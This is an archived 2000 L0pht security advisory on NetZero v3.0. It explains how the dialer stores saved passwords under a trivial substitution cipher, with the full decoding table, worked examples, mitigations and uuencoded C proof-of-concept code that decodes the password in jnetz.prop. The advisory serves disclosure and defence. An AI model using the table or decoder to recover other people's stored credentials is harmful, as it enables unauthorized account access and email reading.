exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

l0pht.00-07-18.netzero

l0pht.00-07-18.netzero
Posted Jul 25, 2000
Authored by Brian Carrier | Site l0pht.com

L0pht Security Advisory - Passwords can be easily decrypted by exploiting NetZero's encryption algorithm. Includes proof of concept code to decode the password stored in jnetz.prop.

tags | proof of concept
SHA-256 | 18ccbc25607e0b2335bd76b829e896cac1e0716922f3dfbdd160e52c8cc11c82

l0pht.00-07-18.netzero

Change Mirror Download

@Stake Inc.
L0pht Research Labs

www.atstake.com www.L0pht.com


Security Advisory


Advisory Name: NetZero Password Encryption Algorithm
Release Date: 07.18.2000
Application: NetZero V3.0 and earlier
Platform: Microsoft Windows 95, 98, NT, 2000
Severity: Low. Passwords can be easily decrypted by
exploiting NetZero's encryption algorithm
Author: Brian Carrier [bcarrier@atstake.com]
Vendor Status: Vendor Contacted 6.19.00
Web: http://www.L0pht.com/advisories.html

Forward:
It is unfortunately common practice that applications which allow
users to remember their passwords as a convenience rarely encrypt them
but instead opt to simply obfuscate them. This does not alter the fact
that user perception and expectation, for the majority of users at least,
is often incorrectly set. Often times convenience eschews security in
these products.

There are dozens of applications available that make this same mistake.
This advisory is not an attempt to single one vendor out but rather
continue to remind of the common problem of storing secrets and the
reliance of simple obfuscation. If effort is taken to obfuscate or hide
something then it must have been seen as valuable to someone. If not,
why bother? Much the way buffer overflows abound so do simple obfuscation
mechanisms. As such, it is important to continue to bring them to light.

Unfortunately it is often the case that the average user places
as much trust in these as stronger systems through the apparent similarity
in user interface. As suggested by Aleph1, the MS CryptoAPI
CryptoProectetData() and CryptUnprotectData() functions currently allow
applications to store secrets encrypted, based on the user's credentials.
Therefore, since the methods currently exist for secure data storage, they
should be utilized by all applications to provide users with a consistent
level of protection.

This advisory is designed to help people see ways of looking at, and
for, these sorts of problems. Or even in being aware of the situation,
to view it as a non-problem. Teaching someone to fish rather than simply
providing one meal. Enjoy the classical substitution cipher :)

Overview:
NetZero is a service that provides free Internet access to customers
in exchange for the permission to advertise. NetZero's users log into the
network with a login and password that are saved in an ASCII text file on
the users system. This advisory addresses a weak encryption algorithm
that is used to protect the password from unauthorized access.

In order for a NetZero account to be compromised, an attacker must
have access to the machine or use another vulnerability to read the file.
Once access is obtained, the attacker can easily determine the user's
NetZero login and password in less than a seconds time. Once the login
and password have been determined, the attacker can read the users email
and attack other systems under the users identity.

This is a common problem in many services of this type. One quick
solution to at least minimize the problem, should this risk be deemed
unacceptable, is to disable the _Save Password_ option.

Detailed Description:
The login and password that are required to log into the NetZero
network are stored in an ASCII file, id.dat, in the NetZero directory.
If the user chooses to have the application save the password, then
jnetz.prop also contains the login and password. The password in both
files is encrypted using a variation of a simple substitution cipher.

The classical substitution cipher is a 1-to-1 mapping between
characters where each plaintext character is replaced by one ciphertext
character. For example, let P_i be the plaintext character in location
'i' and C_j be the ciphertext character in location 'j', then C_i is the
character that P_i maps to.

The NetZero substitution cipher replaces each plaintext character by
two ciphertext characters, but the two ciphertext characters are not
stored together. When substituting character P_i of a password of length
'n', the first ciphertext character is C_i and the second character is
C_n+i.

The two ciphertext characters are derived from the following table:
| 1 a M Q f 7 g T 9 4 L W e 6 y C
--+----------------------------------
g | ` a b c d e f g h i j k l m n o
T | p q r s t u v w x y z { | } ~
f | @ A B C D E F G H I J K L M N O
7 | P Q R S T U V W X Y Z [ \ ] ^ _
Q | 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
M | SP ! " # $ % & ' ( ) * + , - . /

The characters inside the table represent the ASCII plaintext characters
and SP represents a space.

When encrypting a string, P, of length 'n', find each character in the
table and place the column header into C_i and place the row header into
C_n+i.

For example:
E(a) = ag
E(aa) = aagg
E(aqAQ1!) = aaaaaagTf7QM
E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg

When decrypting a string, C, of length '2n', then P_i will be the
element in the above table where the column headed by C_i and the row
headed by C_n+i intersect.

For example:
D(af) = A
D(aaff) = AA
D(aaMMQQfgfgfg) = AaBbCc


Temporary Solution:
Exploitation of this vulnerability is only possible once an attacker
has gained access to the id.dat or jnetz.prop files. Therefore, NetZero
users should not have the application save their password and they should
delete the id.dat file every time they start the application.


Vendor Response:
Vendor has acknowledged receipt of the advisory and has not provided
a response as to any actions they intend to take.

Proof-of-Concept Code:
The following code will demonstrate that the password is easily
decrypted. Simply uudecode, compile, and run in a directory that contains
jnetz.prop.

begin 666 netzero.c
M(VEN8VQU9&4@/'-T9&EO+F@^"B-I;F-L=61E(#QS=')I;F<N:#X*"B-D969I
M;F4@54E$7U-)6D4)-C0*(V1E9FEN92!005-37T-)4$A%4E]325I%"3$R. HC
M9&5F:6YE(%!!4U-?4$Q!24Y?4TE:10DV- HC9&5F:6YE($)51E]325I%(#(U
M-@H*8V]N<W0@8VAA<B!D96-486)L95LV75LQ-ET@/2!["B @>R=@)RPG82<L
M)V(G+"=C)RPG9"<L)V4G+"=F)RPG9R<L)V@G+"=I)RPG:B<L)VLG+"=L)RPG
M;2<L)VXG+"=O)WTL"B @>R=P)RPG<2<L)W(G+"=S)RPG="<L)W4G+"=V)RPG
M=R<L)W@G+"=Y)RPG>B<L)WLG+"=\)RPG?2<L)WXG+#!]+ H@('LG0"<L)T$G
M+"=")RPG0R<L)T0G+"=%)RPG1B<L)T<G+"=()RPG22<L)THG+"=+)RPG3"<L
M)TTG+"=.)RPG3R=]+ H@('LG4"<L)U$G+"=2)RPG4R<L)U0G+"=5)RPG5B<L
M)U<G+"=8)RPG62<L)UHG+"=;)RPG7%PG+"==)RPG7B<L)U\G?2P*("![)S G
M+"<Q)RPG,B<L)S,G+"<T)RPG-2<L)S8G+"<W)RPG."<L)SDG+"<Z)RPG.R<L
M)SPG+"<])RPG/B<L)S\G?2P*("![)R G+"<A)RPG(B<L)R,G+"<D)RPG)2<L
M)R8G+"=<)R<L)R@G+"<I)RPG*B<L)RLG+"<L)RPG+2<L)RXG+"<O)WT*?3L*
M"FEN="!N>E]D96-R>7!T*&-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)?
M4TE:15TL( H@(&-H87(@8U!L86EN4&%S<UM005-37U!,04E.7U-)6D5=*0I[
M"@EI;G0@<&%S<TQE;BP@:2P@:61X,2P@:61X,CL*"7!A<W-,96X@/2!S=')L
M96XH8T-I<&AE<E!A<W,I+S(["@D*"6EF("AP87-S3&5N(#X@4$%34U]03$%)
M3E]325I%*0H)>PH)"7!R:6YT9B@B17)R;W(Z(%!L86EN('1E>'0@87)R87D@
M=&]O('-M86QL7&XB*3L*"0ER971U<FX@,3L*"7T*"@EF;W(@*&D@/2 P.R!I
M(#P@<&%S<TQE;CL@:2LK*0H)>PH)"7-W:71C:"AC0VEP:&5R4&%S<UMI72D*
M"0E["@D)8V%S92 G,2<Z"@D)"6ED>#(@/2 P.R!B<F5A:SL*"0EC87-E("=A
M)SH*"0D):61X,B ](#$[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@R(#T@
M,CL@8G)E86L["@D)8V%S92 G42<Z"@D)"6ED>#(@/2 S.R!B<F5A:SL*"0EC
M87-E("=F)SH*"0D):61X,B ](#0[(&)R96%K.PH)"6-A<V4@)S<G.@H)"0EI
M9'@R(#T@-3L@8G)E86L["@D)8V%S92 G9R<Z"@D)"6ED>#(@/2 V.R!B<F5A
M:SL*"0EC87-E("=4)SH*"0D):61X,B ](#<[(&)R96%K.PH)"6-A<V4@)SDG
M.@H)"0EI9'@R(#T@.#L@8G)E86L["@D)8V%S92 G-"<Z"@D)"6ED>#(@/2 Y
M.R!B<F5A:SL*"0EC87-E("=,)SH*"0D):61X,B ](#$P.R!B<F5A:SL*"0EC
M87-E("=7)SH*"0D):61X,B ](#$Q.R!B<F5A:SL*"0EC87-E("=E)SH*"0D)
M:61X,B ](#$R.R!B<F5A:SL*"0EC87-E("<V)SH*"0D):61X,B ](#$S.R!B
M<F5A:SL*"0EC87-E("=Y)SH*"0D):61X,B ](#$T.R!B<F5A:SL*"0EC87-E
M("=#)SH*"0D):61X,B ](#$U.R!B<F5A:SL*"0ED969A=6QT.@H)"0EP<FEN
M=&8H(D5R<F]R.B!5;FMN;W=N($-I<&AE<B!497AT(&EN9&5X.B E8UQN(BP@
M8T-I<&AE<E!A<W-;:5TI.PH)"0ER971U<FX@,3L*"0D)8G)E86L["@D)?0H*
M"0ES=VET8V@H8T-I<&AE<E!A<W-;:2MP87-S3&5N72D*"0E["@D)8V%S92 G
M9R<Z"@D)"6ED>#$@/2 P.R!B<F5A:SL*"0EC87-E("=4)SH*"0D):61X,2 ]
M(#$[(&)R96%K.PH)"6-A<V4@)V8G.@H)"0EI9'@Q(#T@,CL@8G)E86L["@D)
M8V%S92 G-R<Z"@D)"6ED>#$@/2 S.R!B<F5A:SL*"0EC87-E("=1)SH*"0D)
M:61X,2 ](#0[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@Q(#T@-3L@8G)E
M86L["@D)9&5F875L=#H*"0D)<')I;G1F*")%<G)O<CH@56YK;F]W;B!#:7!H
M97(@5&5X="!3970Z("5C7&XB+" *"0D)("!C0VEP:&5R4&%S<UMI*W!A<W-,
M96Y=*3L*"0D)<F5T=7)N(#$["@D)"6)R96%K.PH)"7T*"@D)8U!L86EN4&%S
M<UMI72 ](&1E8U1A8FQE6VED>#%=6VED>#)=.PH)?0H)8U!L86EN4&%S<UMI
M72 ](# ["@H)<F5T=7)N(# ["GT*"FEN="!M86EN*'9O:60I"GL*"49)3$4@
M*FA087)A;7,["@EC:&%R(&-"=69F97);0E5&7U-)6D5=+"!C54E$6U5)1%]3
M25I%73L*"6-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)?4TE:15TL(&-0
M;&%I;E!A<W-;4$%34U]03$%)3E]325I%73L*"6EN="!D;VYE(#T@,CL*"@EP
M<FEN=&8H(EQN3F5T(%IE<F\@4&%S<W=O<F0@1&5C<GEP=&]R7&XB*3L*"7!R
M:6YT9B@B0G)I86X@0V%R<FEE<B!;8F-A<G)I97) 871S=&%K92YC;VU=7&XB
M*3L*"7!R:6YT9B@B0%-T86ME($PP<&AT(%)E<V5A<F-H($QA8G-<;B(I.PH)
M<')I;G1F*")H='1P.B\O=W=W+F%T<W1A:V4N8V]M7&Y<;B(I.PH*"6EF("@H
M:%!A<F%M<R ](&9O<&5N*")J;F5T>BYP<F]P(BPB<B(I*2 ]/2!.54Q,*0H)
M>PH)"7!R:6YT9B@B56YA8FQE('1O(&9I;F0@:FYE='HN<')O<"!F:6QE7&XB
M*3L*"0ER971U<FX@,3L*"7T)"@H)=VAI;&4@*"AF9V5T<RAC0G5F9F5R+"!"
M549?4TE:12P@:%!A<F%M<RD@(3T@3E5,3"D@)B8@*&1O;F4@/B P*2D*"7L*
M"0EI9B H<W1R;F-M<"AC0G5F9F5R+" B4')O9E5)1#TB+" X*2 ]/2 P*0H)
M"7L*"0D)9&]N92TM.PH)"0ES=')N8W!Y*&-5240L(&-"=69F97(@*R X+"!5
M241?4TE:12D["@D)"7!R:6YT9B@B57-E<DE$.B E<R(L(&-5240I.PH)"7T*
M"@D):68@*'-T<FYC;7 H8T)U9F9E<BP@(E!R;V905T0](BP@."D@/3T@,"D*
M"0E["@D)"61O;F4M+3L*"0D)<W1R;F-P>2AC0VEP:&5R4&%S<RP@8T)U9F9E
M<B K(#@L(%!!4U-?0TE02$527U-)6D4I.PH)"0EP<FEN=&8H(D5N8W)Y<'1E
M9"!087-S=V]R9#H@)7,B+"!C0VEP:&5R4&%S<RD["@H)"0EI9B H;GI?9&5C
M<GEP="AC0VEP:&5R4&%S<RP@8U!L86EN4&%S<RD@(3T@,"D*"0D)"7)E='5R
M;B Q.PH)"0EE;'-E"@D)"0EP<FEN=&8H(E!L86EN(%1E>'0@4&%S<W=O<F0Z
M("5S7&XB+"!C4&QA:6Y087-S*3L*"0E]"@H)?0H*"69C;&]S92AH4&%R86US
M*3L*"@EI9B H9&]N92 ^(# I"@E["@D)<')I;G1F*"));G9A;&ED(&IN971Z
M+G!R;W @9FEL95QN(BD["@D)<F5T=7)N(#$["@E](&5L<V4@>PH)"7)E='5R
*;B P.PH)?0I]"EQN

end

bcarrier@atstake.com

[ For more advisories check out http://www.l0pht.com/advisories.html ]
L-ZERO-P-H-T

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close